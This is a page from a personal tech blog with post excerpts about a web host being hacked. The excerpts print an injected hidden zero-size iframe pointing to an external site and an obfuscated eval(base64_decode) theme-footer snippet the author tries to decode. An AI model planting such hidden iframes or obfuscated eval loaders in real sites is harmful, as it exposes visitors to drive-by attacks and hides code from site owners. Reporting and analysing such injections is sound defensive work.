18May

Servage got hacked again

Hacks, Hosting

This time, every index file on the cluster I’m in got injected with this code

<!– + –><iframe src=”http://rublic.info/ice/ice/index.php” width=”0″ height=”0″></iframe><!– + –>
<!– + –><iframe src=”http://rublic.info/ice/ice/index.php” width=”0″ height=”0″></iframe><!– + –>
I’ve removed the malicious code and i suggest you check your websites too.

Tags: Hacked, iframe, Inject, Servage

2 comments | read more »
07Mar

Servage hacked: Exploit-Iframe (Trojan) Infection

Hacks, PHP, Wordpress

I found this infection on all the blogs i host at Servage, i dont know what caused it, i doubt its my fault because the infection was found in all index.php files trough my websites, and all index.php were writable only by the owner. So i think this might be a hack on Servage’s servers [...]

27 comments | read more »
27Feb

Apache - Restrict access to certain directory by IP

Apache, Debian, Hacks

You can use this method to allow certain ip’s to access certain directories or to deny certain ip’s to access certain directories, its up to you how you want to protect that directory. In this example im gonna show you how to restrict access to a directory named “restricted” to a single ip, so when [...]

No comments | read more »
23Feb

Decoding with the script from earlier post failed on some code

Hacks, PHP, Wordpress

Today i tried to decode another pice of ugly code with “eval(gzinflate(base64_decode” and i was surprised to find that the script couldnt decode this piece. As usually the code is from a themes footer in which i dont want to keep theep the outgoing reffers.
Here is the code:

$_F=__FILE__;$_X=’Pz48ZDR2IDRkPSJmMjJ0NXIiPg0KPGM1bnQ1cj48Zj
JudCBzNHo1PSAiNiI+RDRzdHI0YjN0NWQgYnkgMW4gPDEgaHI1Zj0iaHR0cD
ovL3d3dy5raDFsNGRzbDRmNS5jMm0iIHQxcmc1dD1uNXc+SW50NXJuNXQ
gRW50cjVwcjVuNTNyPC8xPiB8ICBTcDJuczJyNWQgYnkgMSA8MSBocjVmP
SJodHRwOi8vd3d3LjJmZmI1MXQ0bmsuYzJtIiB0MXJnNXQ9bjV3PlQxdHQyM
jwvMT4gczR0NTwvYzVudDVyPg0KCTwvZDR2Pg0KDQo8L2Q0dj4NCg0KDQ
o8P3BocCAvKiAiSjNzdCB3aDF0IGQyIHkyMyB0aDRuayB5MjMncjUgZDI0bm
cgRDF2NT8iICovID8+DQoNCgkJPD9waHAgd3BfZjIydDVyKCk7ID8+DQo8L2
IyZHk+DQo8L2h0bWw+DQo=’;eval(base64_decode(’JF9YPWJhc2U2NF9k
ZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdW
llMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0
YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==’));

For the moment i’m stuck with the code.. [...]

2 comments | read more »